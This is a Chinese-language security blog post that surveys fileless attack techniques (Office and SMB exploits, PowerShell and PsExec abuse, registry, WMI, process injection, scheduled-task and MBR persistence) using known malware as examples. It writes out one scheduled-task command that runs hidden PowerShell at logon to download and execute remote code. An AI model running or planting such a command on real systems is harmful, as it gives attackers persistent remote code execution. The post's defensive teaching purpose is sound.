<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta property="og:type" content="article">
<meta property="og:title" content="无文件攻击的各种姿势">
<meta property="og:url" content="https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/">
<meta property="og:site_name" content="Sampson&#39;s blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371317_5cd399b54f58c.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371335_5cd399c79f488.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371423_5cd39a1fac7f8.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371440_5cd39a301215c.png!small">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-881ff3a8109cce42b5c62c9b8b5bc7f2_hd.webp">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371644_5cd39afcce899.png!small">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-bc918a8899a637d237c26a5434c167bd_hd.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-9a3c16b1a6f6661f58c1659a5d9db1b6_hd.webp">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371666_5cd39b127825f.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371678_5cd39b1ed0f38.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557371692_5cd39b2c9ea2e.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372389_5cd39de5a9f0b.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372402_5cd39df29a13d.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372424_5cd39e0836600.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372485_5cd39e4590a2b.png!small">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-f50947a09caeb22a6470e3fb2cf10dec_hd.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-bc7eab69d2b063c455caa8c059c23098_hd.webp">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372551_5cd39e87ba5eb.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372565_5cd39e9588079.png!small">
<meta property="og:image" content="https://image.3001.net/images/20190509/1557372574_5cd39e9ebde8a.png!small">
<meta property="article:published_time" content="2021-09-16T06:40:01.000Z">
<meta property="article:modified_time" content="2021-09-16T06:40:01.000Z">
<meta property="article:author" content="Sampson.Z">
<meta property="article:tag" content="无文件攻击">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image.3001.net/images/20190509/1557371317_5cd399b54f58c.png!small">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>无文件攻击的各种姿势</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/zhuxinkai.site/">zhuxinkai.site</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2021/10/19/Gartner2020%E5%B9%B4%E5%8D%81%E5%A4%A7%E5%AE%89%E5%85%A8%E9%A1%B9%E7%9B%AE%E8%AF%A6%E8%A7%A3/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2021/08/25/%E9%80%90%E4%B8%80%E8%A7%A3%E8%AF%BBGartner%E8%AF%84%E5%87%BA%E7%9A%8411%E5%A4%A7%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%8A%80%E6%9C%AF/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&text=无文件攻击的各种姿势"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&is_video=false&description=无文件攻击的各种姿势"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=无文件攻击的各种姿势&body=Check out this article: https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&name=无文件攻击的各种姿势&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&t=无文件攻击的各种姿势"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        无文件攻击的各种姿势
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Sampson.Z</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-09-16T06:40:01.000Z" itemprop="datePublished">2021-09-16</time>
        
        (Updated: <time datetime="2021-09-16T06:40:01.000Z" itemprop="dateModified">2021-09-16</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB/" rel="tag">无文件攻击</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/css/lightgallery.min.css"><div class=".article-gallery" <p>原创：<a href>合天智汇</a><p></p>
<p>0x01</p>
<p>很多应急响应行动中都会出现这样的场景：客户主机出现CPU占用率很高或有连接C&amp;C服务器的可疑现象，但是使用杀软查杀却没有发现磁盘上有恶意文件。这其实就是无文件攻击。</p>
<p>“无文件攻击”这个名词伴随“APT攻击”的慢慢火热而进入了人们的视野。APT的特点是不易被安全检测引擎所发现，当中的功劳很大程度都是归“无文件攻击”所有。</p>
<p>因为无文件攻击无需落地到目标的磁盘，因此反病毒引擎一般很难检测到，即使通过检测内存来试图追踪内存中的“无文件攻击”，但往往只能采用白名单等笨方法，但攻击者利用内存滞留技术往往能把杀毒软件耍得团团转。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371317_5cd399b54f58c.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371317_5cd399b54f58c.png!small"></a></p>
<p>但是“无文件攻击”这一术语往往会让人产生歧义，比如无文件攻击就代表真的没有攻击文件吗?其实“无文件攻击”只是一种攻击策略，其出发点就是避免将恶意文件放在磁盘上，以逃避安全检测。</p>
<p>现在安全产品的一大挑战就是给出无文件攻击的防御方案。未知攻，焉知防？本篇文章就来分析已知的无文件攻击方式。</p>
<p>0x02</p>
<p>无文件攻击方式分为三大类：漏洞型攻击、灰色工具型攻击、潜伏型攻击，这几类攻击不是独立，有时候会在同一个攻击场景中出现，如用户打开了一个恶意office文档，这个文档通过漏洞直接执行了powershell脚本进行木马植入，最后通过写入注册表实现持久化潜伏。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371335_5cd399c79f488.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371335_5cd399c79f488.png!small"></a></p>
<p>0x03漏洞型攻击</p>
<p>漏洞型攻击是杀伤力最大的无文件攻击方式，典型的漏洞有Office漏洞、SMB漏洞、以及各种WEB服务的漏洞，当目标主机存在漏洞时，病毒可以通过漏洞直接执行恶意命令攻击主机或将自己复制到主机实现扩散。漏洞型攻击行为隐蔽，且一般不会释放文件到本地，所以使用杀软几乎无法防御。</p>
<p>1. office漏洞</p>
<p>office是一个较为普遍的漏洞，常被用于APT攻击。黑客一般会给特定的目标用户发送精心设计的Office文档，此文档包含可以通过漏洞触发的恶意代码，当用户使用存在漏洞的Offic打开它时，office就会自动执行恶意代码，达到入侵的目的。</p>
<p>MsOffice.doc病毒，MsOffice.doc文档格式为rtf，为一个CVE-2017-0199的漏洞利用样本。将MsOffice.doc文档中的ole对象提取出来后，可以看到其指向的恶意链接为http://[xxxx].com/[xxxx]/1，如下图</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371423_5cd39a1fac7f8.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371423_5cd39a1fac7f8.png!small"></a></p>
<p>恶意链接1文件对应着一个vbscript脚本，脚本内容如下</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371440_5cd39a301215c.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371440_5cd39a301215c.png!small"></a></p>
<p>该vbs功能是执行一段powershell加密代码实现信息窃取。只要用户不小心打开了恶意文档，存在漏洞的Office就会自动读取远程的恶意vbs代码并执行恶意操作。由于用户点击文档后的所有攻击过程均无落地文件，所以杀软难以检测。</p>
<p>2. smb漏洞</p>
<p>SMB是windows系统自启动的通信服务，一旦它存在漏洞，那么几乎所有的windows主机都会受到风险。</p>
<p>勒索病毒、挖矿病毒已经存在已久了，但为什么WannaCry、WannaMine影响那么大？就是因为它们使用了SMB漏洞进行传播，可以将自身复制到内网中的所有漏洞主机上，实现大规模的感染。如下图红色框是漏洞利用环节，病毒通过此漏洞可以进行远程攻击。</p>
<p><a target="_blank" rel="noopener" href="https://pic1.zhimg.com/80/v2-881ff3a8109cce42b5c62c9b8b5bc7f2_hd.webp" class="gallery-item"><img src="https://pic1.zhimg.com/80/v2-881ff3a8109cce42b5c62c9b8b5bc7f2_hd.webp"></a></p>
<p>3. web服务漏洞</p>
<p>诸如SQLServer、Nginx、Apache、IIS等WEB服务程序都被挖出过大型的缓冲区溢出漏洞，病毒可以通过这些漏洞实现远程命令执行，由于这些服务大都暴露在公网上，所以一旦漏洞被爆出，大范围的主机将受到风险。</p>
<p>SQL Slammer是2003年爆发的一种病毒，其利用SQLSERVER 2000解析端口1434缓冲区溢出漏洞对其服务进行攻击。SQLSlammer也被称为“蓝宝石”(Sapphire)，2003年1月25日首次出现。它是一个非同寻常的蠕虫病毒，给互联网的流量造成了显而易见的负面影响。有意思的是，它的目标并非终端计算机用户，而是服务器。它是一个单包的、长度为376字节的蠕虫病毒，它随机产生IP地址，并向这些IP地址发送自身。如果某个IP地址恰好是一台运行着未打补丁的微软SQL服务器桌面引擎(SQLServer Desktop Engine)软件的计算机，它也会迅速复制病毒到随机IP地址的主机</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371644_5cd39afcce899.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371644_5cd39afcce899.png!small"></a></p>
<p>0x04灰色工具型攻击</p>
<p>灰色工具是指那些可以被用来执行恶意代码的合法工具，如：Powershell、PsExec等，病毒可以使用这些工具来间接执行恶意代码。由于IT管理员日常工作中都会使用这些合法工具来辅助管理系统、网络，所以杀软对这类攻击的检测也极具挑战性。</p>
<p>1. Powershell</p>
<p>powershell属于系统工具，在杀软的白名单中，要查杀只能检测其执行的脚本代码，但因为powershell支持各种混淆，所以对其进行检测也极为困难。</p>
<p>如下是powershellMiner病毒，由于它没有病毒文件，而是直接执行powerhsell挖矿代码，行为极其隐蔽，杀软基本查杀不出来。</p>
<p><a target="_blank" rel="noopener" href="https://pic1.zhimg.com/80/v2-bc918a8899a637d237c26a5434c167bd_hd.webp" class="gallery-item"><img src="https://pic1.zhimg.com/80/v2-bc918a8899a637d237c26a5434c167bd_hd.webp"></a></p>
<p><a target="_blank" rel="noopener" href="https://pic1.zhimg.com/80/v2-9a3c16b1a6f6661f58c1659a5d9db1b6_hd.webp" class="gallery-item"><img src="https://pic1.zhimg.com/80/v2-9a3c16b1a6f6661f58c1659a5d9db1b6_hd.webp"></a></p>
<p>如上图，病毒直接使用powershell.exe进行挖矿，CPU占用率达到87%，其脚本功能是从wmi类中读取挖矿代码并执行。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371666_5cd39b127825f.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371666_5cd39b127825f.png!small"></a></p>
<p>2. Psexec</p>
<p>PsExec也是windows的系统工具，经常被IT管理员用于远程管理内网主机。但PsExec也有可能会被病毒利用，如下是SOREBRECT病毒，只要SOREBRECT获取了远程主机的管理员密码，就可以使用PsExec远程执行命令，然后将恶意代码注入到svchost.exe中执行。PsExec.exe虽不是系统自带工具，但在windows官网上可以下载，也存在于杀入的白名单中。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371678_5cd39b1ed0f38.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371678_5cd39b1ed0f38.png!small"></a></p>
<p>0x05潜伏性攻击</p>
<p>为了让病毒母体被删除后以及每次开机后还能继续执行恶意代码，持久化潜伏成为一种常见的无文件攻击方式。通过将恶意代码存储在注册表、WMI、系统进程（进程注入）、MBR、定时任务等地方，可以让恶意代码隐蔽地自动执行。</p>
<p>1). 注册表</p>
<p>注册表中包含许多敏感表项，如HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,只要将病毒的路径或恶意的脚本存储到这里，系统每次开机都会执行这些病毒和恶意脚本，Poweliks就是使用注册表来进行持久化攻击的代表。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557371692_5cd39b2c9ea2e.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557371692_5cd39b2c9ea2e.png!small"></a></p>
<p>poweliks病毒将恶意代码放在HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run，这样每次系统每次开机都会自动执行恶意代码。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372389_5cd39de5a9f0b.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372389_5cd39de5a9f0b.png!small"></a></p>
<p>2. Wmi</p>
<p>WMI以本地和远程方式提供了许多管理功能，包括查询系统信息、启动和停止进程以及设置条件触发器。管理员可以使用各种工具（比如Windows的WMI命令行工具wmic.exe）或者脚本编程语言（如PowerShell）提供的API接口来访问WMI。这样一个强大的工具自然会被黑客所盯上，著名的无文件攻击病毒POSHSPY就使用WMI来存储及定时执行恶意代码。以下是此病毒使用的一个触发器，意思是每周一、周二、周四、周五以及周六的当地时间上午11:33执行一次恶意脚本。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372402_5cd39df29a13d.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372402_5cd39df29a13d.png!small"></a></p>
<p>恶意脚本是一段powershell脚本，执行的恶意代码也是存储在WMI类中，</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372424_5cd39e0836600.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372424_5cd39e0836600.png!small"></a></p>
<p>3. 进程注入</p>
<p>进程注入技术很久以前就被病毒所利用了，病毒运行后一般会将恶意代码注入到系统进程中，然后将自身删除，达到隐藏的效果，如下图是一个新型的挖矿病毒wmixml，它通过将挖矿代码注入到svchost.exe中实现挖矿，我们可以看到svchost.exe的CPU占用率极高，高达25%。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372485_5cd39e4590a2b.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372485_5cd39e4590a2b.png!small"></a></p>
<p>通过逆向分析wmixml病毒，发现它依次调用了VirtualAllocEx、WriteProcessMemory、ResumeThread来实现注入。</p>
<p><a target="_blank" rel="noopener" href="https://pic1.zhimg.com/80/v2-f50947a09caeb22a6470e3fb2cf10dec_hd.webp" class="gallery-item"><img src="https://pic1.zhimg.com/80/v2-f50947a09caeb22a6470e3fb2cf10dec_hd.webp"></a></p>
<p>4. 定时任务</p>
<p>定时任务是一个实用的工具，比如我们想实现每隔一段时间进行下文件备份、日志记录等等，就可以使用到定时任务，然而，若病毒执行了以下命令，那么就会带来恶意的操作，这段代码是只要用户一登录就调用powershell执行网上的恶意代码：</p>
<p>schtasks/create /tn Trojan /tr “powershell.exe -WindowStyle hidden -NoLogo-NonInteractive -ep bypass -nop -c ‘IEX ((new-objectnet.webclient).downloadstring(‘’[REMOVED]’’))’” /scONLOGON /ru System</p>
<p>定时任务还常被病毒用来绕过UAC。</p>
<p><a target="_blank" rel="noopener" href="https://pic1.zhimg.com/80/v2-bc7eab69d2b063c455caa8c059c23098_hd.webp" class="gallery-item"><img src="https://pic1.zhimg.com/80/v2-bc7eab69d2b063c455caa8c059c23098_hd.webp"></a></p>
<p>5. Mbr</p>
<p>MBR是系统引导程序，对系统的启动很关键，试想，若病毒隐藏恶意代码于在MBR中，就可以实现先于系统加载，绕过杀软的效果。Petya病毒是继WannaCry后的又一大勒索病毒，它比WannaCry更狠，将文件加密后，还把一段恶意代码写入MBR以实现持久化攻击，使得主机开机后无法正常启动系统，而是直接显示勒索提示框。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372551_5cd39e87ba5eb.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372551_5cd39e87ba5eb.png!small"></a></p>
<p>通过逆向分析Petya，可以看到其将恶意代码写入MBR操作。</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372565_5cd39e9588079.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372565_5cd39e9588079.png!small"></a></p>
<p>相关操作学习</p>
<p>基于BinWalk实现文件读取：详细讲解CTF竞赛中磁盘取证分析类题目的结题方法，覆盖文件提取、已删文件恢复、文件数据修复、隐写信息提取等基本知识点。点击<a target="_blank" rel="noopener" href="http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182015073110594300001">实验:基于BinWalk实现文件提取(合天网安实验室)</a>开始操作！</p>
<p><a target="_blank" rel="noopener" href="https://image.3001.net/images/20190509/1557372574_5cd39e9ebde8a.png!small" class="gallery-item"><img src="https://image.3001.net/images/20190509/1557372574_5cd39e9ebde8a.png!small"></a></p>
<p>声明：笔者初衷用于分享与普及网络知识，若读者因此作出任何危害网络安全行为后果自负，与合天智汇及原作者无关，本文为合天原创，如需装载，请注明出处！</p>
</div><script src="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/js/lightgallery.min.js"></script><script>if (typeof lightGallery !== 'undefined') {
        var options = {
            selector: '.gallery-item'
        };
        lightGallery(document.getElementsByClassName('.article-gallery')[0], options);
        }</script>
  </div>
</article>












		<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
		<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
		<!--<script src="//cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script>
    <script src='//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js'></script>-->
	<div id="vcomments"></div>
	<script>
		var notify = false == true ? true : false;
		var verify = false == true ? true : false;
		var visitor = true == true ? true : false;
  new Valine({
      el: '#vcomments',
				notify: notify,
				verify: verify,
    	app_id: 'blb6PJsThCi2aLC84uljjQzT-gzGzoHsz',
      app_key: '1PBJebm7VF0AiFpsf6Hhapdv',
			lang: 'en',
			placeholder: 'ヾﾉ≧∀≦)o快来评论一下吧!',
			avatar: 'monsterid',
			pageSize: 10,
			visitor: visitor
        });
    </script>






        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/zhuxinkai.site/">zhuxinkai.site</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&text=无文件攻击的各种姿势"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&is_video=false&description=无文件攻击的各种姿势"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=无文件攻击的各种姿势&body=Check out this article: https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=无文件攻击的各种姿势"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&name=无文件攻击的各种姿势&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.buhuixiu.com/2021/09/16/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/&t=无文件攻击的各种姿势"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
